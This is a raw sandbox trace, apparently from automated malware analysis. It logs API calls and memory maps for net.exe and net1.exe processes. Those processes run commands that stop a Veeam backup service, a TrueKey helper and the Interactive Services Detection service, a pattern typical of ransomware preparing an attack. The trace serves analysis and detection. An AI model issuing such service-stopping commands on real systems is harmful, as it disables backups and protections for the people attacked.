lpBuffer="The service name is invalid.\r\n") returned 0x1e [0117.249] GetFileType (hFile=0xb) returned 0x2 [0117.249] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af718 | out: lpMode=0x1af718) returned 1 [0117.249] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af710, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x1af710*=0x1e) returned 1 [0117.250] GetFileType (hFile=0xb) returned 0x2 [0117.250] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af718 | out: lpMode=0x1af718) returned 1 [0117.250] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af710, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x1af710*=0x2) returned 1 [0117.251] _ultow (in: _Dest=0x889, _Radix=1767296 | out: _Dest=0x889) returned="2185" [0117.251] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0117.251] GetFileType (hFile=0xb) returned 0x2 [0117.253] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af718 | out: lpMode=0x1af718) returned 1 [0117.253] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af710, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x1af710*=0x34) returned 1 [0117.253] GetFileType (hFile=0xb) returned 0x2 [0117.254] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af718 | out: lpMode=0x1af718) returned 1 [0117.254] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af710, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x1af710*=0x2) returned 1 [0117.255] NetApiBufferFree (Buffer=0x214d60) returned 0x0 [0117.255] NetApiBufferFree (Buffer=0x21c130) returned 0x0 [0117.255] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyServiceHelper /y" [0117.255] exit (_Code=2) Process: id = "333" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x50d6d000" os_pid = "0xc0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamBrokerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11774 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11775 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11776 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11777 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11778 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11779 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11780 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11781 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11782 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11783 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11784 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 11785 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11786 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11787 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 11788 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11789 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11790 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11791 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11792 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11967 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11968 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 11969 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 11970 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 11971 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 11972 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 11973 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11974 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11975 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11976 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11977 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11978 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11979 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11980 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11981 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11982 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 856 os_tid = 0x814 Process: id = "334" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x4fec6000" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "329" os_parent_pid = "0x9dc" cmd_line = "C:\\Windows\\system32\\net1 stop UI0Detect /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11793 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11794 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11795 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11796 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11797 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11798 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11799 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11800 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11801 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11802 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11803 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 11804 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11805 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11806 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11807 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 11808 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11809 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11810 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11811 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11831 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11832 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 11833 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 11834 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11835 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11836 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11837 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11838 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11839 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11840 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11841 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11842 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11843 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11844 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11845 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11846 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11847 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11848 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11849 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11870 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 857 os_tid = 0x968 [0117.505] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fc90 | out: lpSystemTimeAsFileTime=0x24fc90*(dwLowDateTime=0xfb2e5450, dwHighDateTime=0x1d48689)) [0117.505] GetCurrentProcessId () returned 0xc4 [0117.505] GetCurrentThreadId () returned 0x968 [0117.505] GetTickCount () returned 0x270bc [0117.505] QueryPerformanceCounter (in: lpPerformanceCount=0x24fc98 | out: lpPerformanceCount=0x24fc98*=1816442300000) returned 1 [0117.506] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0117.506] __set_app_type (_Type=0x1) [0117.506] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0117.507] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0117.507] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.507] GetConsoleOutputCP () returned 0x1b5 [0117.514] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0117.515] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0117.517] sprintf_s (in: _DstBuf=0x24fc38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0117.517] setlocale (category=0, locale=".437") returned="English_United States.437" [0117.518] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.518] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0117.519] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop UI0Detect /y" [0117.519] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f9d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0117.519] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0117.519] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fc28 | out: Buffer=0x24fc28*=0x344d50) returned 0x0 [0117.519] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fc28 | out: Buffer=0x24fc28*=0x34c0f0) returned 0x0 [0117.519] _fileno (_File=0x7fefdba2a80) returned 0 [0117.519] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0117.519] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0117.519] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0117.519] _wcsicmp (_String1="config", _String2="stop") returned -16 [0117.519] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0117.519] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0117.519] _wcsicmp (_String1="file", _String2="stop") returned -13 [0117.520] _wcsicmp (_String1="files", _String2="stop") returned -13 [0117.520] _wcsicmp (_String1="group", _String2="stop") returned -12 [0117.520] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0117.520] _wcsicmp (_String1="help", _String2="stop") returned -11 [0117.520] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0117.520] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0117.520] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0117.520] _wcsicmp (_String1="session", _String2="stop") returned -15 [0117.520] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0117.520] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0117.520] _wcsicmp (_String1="share", _String2="stop") returned -12 [0117.520] _wcsicmp (_String1="start", _String2="stop") returned -14 [0117.520] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0117.520] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0117.520] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0117.520] _wcsicmp (_String1="accounts", _String2="UI0Detect") returned -20 [0117.520] _wcsicmp (_String1="computer", _String2="UI0Detect") returned -18 [0117.520] _wcsicmp (_String1="config", _String2="UI0Detect") returned -18 [0117.520] _wcsicmp (_String1="continue", _String2="UI0Detect") returned -18 [0117.520] _wcsicmp (_String1="cont", _String2="UI0Detect") returned -18 [0117.520] _wcsicmp (_String1="file", _String2="UI0Detect") returned -15 [0117.520] _wcsicmp (_String1="files", _String2="UI0Detect") returned -15 [0117.521] _wcsicmp (_String1="group", _String2="UI0Detect") returned -14 [0117.521] _wcsicmp (_String1="groups", _String2="UI0Detect") returned -14 [0117.521] _wcsicmp (_String1="help", _String2="UI0Detect") returned -13 [0117.521] _wcsicmp (_String1="helpmsg", _String2="UI0Detect") returned -13 [0117.521] _wcsicmp (_String1="localgroup", _String2="UI0Detect") returned -9 [0117.521] _wcsicmp (_String1="pause", _String2="UI0Detect") returned -5 [0117.521] _wcsicmp (_String1="session", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="sessions", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="sess", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="share", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="start", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="stats", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="statistics", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="stop", _String2="UI0Detect") returned -2 [0117.521] _wcsicmp (_String1="time", _String2="UI0Detect") returned -1 [0117.521] _wcsicmp (_String1="user", _String2="UI0Detect") returned 10 [0117.521] _wcsicmp (_String1="users", _String2="UI0Detect") returned 10 [0117.521] _wcsicmp (_String1="msg", _String2="UI0Detect") returned -8 [0117.521] _wcsicmp (_String1="messenger", _String2="UI0Detect") returned -8 [0117.521] _wcsicmp (_String1="receiver", _String2="UI0Detect") returned -3 [0117.521] _wcsicmp (_String1="rcv", _String2="UI0Detect") returned -3 [0117.521] _wcsicmp (_String1="netpopup", _String2="UI0Detect") returned -7 [0117.522] _wcsicmp (_String1="redirector", _String2="UI0Detect") returned -3 [0117.522] _wcsicmp (_String1="redir", _String2="UI0Detect") returned -3 [0117.522] _wcsicmp (_String1="rdr", _String2="UI0Detect") returned -3 [0117.522] _wcsicmp (_String1="workstation", _String2="UI0Detect") returned 2 [0117.522] _wcsicmp (_String1="work", _String2="UI0Detect") returned 2 [0117.522] _wcsicmp (_String1="wksta", _String2="UI0Detect") returned 2 [0117.522] _wcsicmp (_String1="prdr", _String2="UI0Detect") returned -5 [0117.522] _wcsicmp (_String1="devrdr", _String2="UI0Detect") returned -17 [0117.522] _wcsicmp (_String1="lanmanworkstation", _String2="UI0Detect") returned -9 [0117.522] _wcsicmp (_String1="server", _String2="UI0Detect") returned -2 [0117.522] _wcsicmp (_String1="svr", _String2="UI0Detect") returned -2 [0117.522] _wcsicmp (_String1="srv", _String2="UI0Detect") returned -2 [0117.522] _wcsicmp (_String1="lanmanserver", _String2="UI0Detect") returned -9 [0117.522] _wcsicmp (_String1="alerter", _String2="UI0Detect") returned -20 [0117.522] _wcsicmp (_String1="netlogon", _String2="UI0Detect") returned -7 [0117.522] _wcsupr (in: _String="UI0Detect" | out: _String="UI0DETECT") returned="UI0DETECT" [0117.523] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x34ce00 [0117.565] GetServiceKeyNameW (in: hSCManager=0x34ce00, lpDisplayName="UI0DETECT", lpServiceName=0xffe15750, lpcchBuffer=0x24fb48 | out: lpServiceName="", lpcchBuffer=0x24fb48) returned 0 [0117.567] _wcsicmp (_String1="msg", _String2="UI0DETECT") returned -8 [0117.567] _wcsicmp (_String1="messenger", _String2="UI0DETECT") returned -8 [0117.567] _wcsicmp (_String1="receiver", _String2="UI0DETECT") returned -3 [0117.567] _wcsicmp (_String1="rcv", _String2="UI0DETECT") returned -3 [0117.567] _wcsicmp (_String1="redirector", _String2="UI0DETECT") returned -3 [0117.567] _wcsicmp (_String1="redir", _String2="UI0DETECT") returned -3 [0117.567] _wcsicmp (_String1="rdr", _String2="UI0DETECT") returned -3 [0117.567] _wcsicmp (_String1="workstation", _String2="UI0DETECT") returned 2 [0117.567] _wcsicmp (_String1="work", _String2="UI0DETECT") returned 2 [0117.567] _wcsicmp (_String1="wksta", _String2="UI0DETECT") returned 2 [0117.567] _wcsicmp (_String1="prdr", _String2="UI0DETECT") returned -5 [0117.567] _wcsicmp (_String1="devrdr", _String2="UI0DETECT") returned -17 [0117.567] _wcsicmp (_String1="lanmanworkstation", _String2="UI0DETECT") returned -9 [0117.567] _wcsicmp (_String1="server", _String2="UI0DETECT") returned -2 [0117.567] _wcsicmp (_String1="svr", _String2="UI0DETECT") returned -2 [0117.567] _wcsicmp (_String1="srv", _String2="UI0DETECT") returned -2 [0117.567] _wcsicmp (_String1="lanmanserver", _String2="UI0DETECT") returned -9 [0117.568] _wcsicmp (_String1="alerter", _String2="UI0DETECT") returned -20 [0117.568] _wcsicmp (_String1="netlogon", _String2="UI0DETECT") returned -7 [0117.568] NetServiceControl (in: servername=0x0, service="UI0DETECT", opcode=0x0, arg=0x0, bufptr=0x24fb50 | out: bufptr=0x24fb50) returned 0x0 [0117.569] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x24fb08 | out: Buffer=0x24fb08*=0x350c80) returned 0x0 [0117.569] OpenServiceW (hSCManager=0x34ce00, lpServiceName="UI0DETECT", dwDesiredAccess=0xc) returned 0x34ce60 [0117.569] QueryServiceStatus (in: hService=0x34ce60, lpServiceStatus=0x24fab0 | out: lpServiceStatus=0x24fab0*(dwServiceType=0x110, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0117.570] GetServiceDisplayNameW (in: hSCManager=0x34ce00, lpServiceName="UI0DETECT", lpDisplayName=0xffe15350, lpcchBuffer=0x24fa88 | out: lpDisplayName="Interactive Services Detection", lpcchBuffer=0x24fa88) returned 1 [0117.570] NetApiBufferFree (Buffer=0x350c80) returned 0x0 [0117.570] CloseServiceHandle (hSCObject=0x34ce60) returned 1 [0117.571] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0117.571] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0117.573] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="The Interactive Services Detection service is not started.\r\n") returned 0x3c [0117.578] 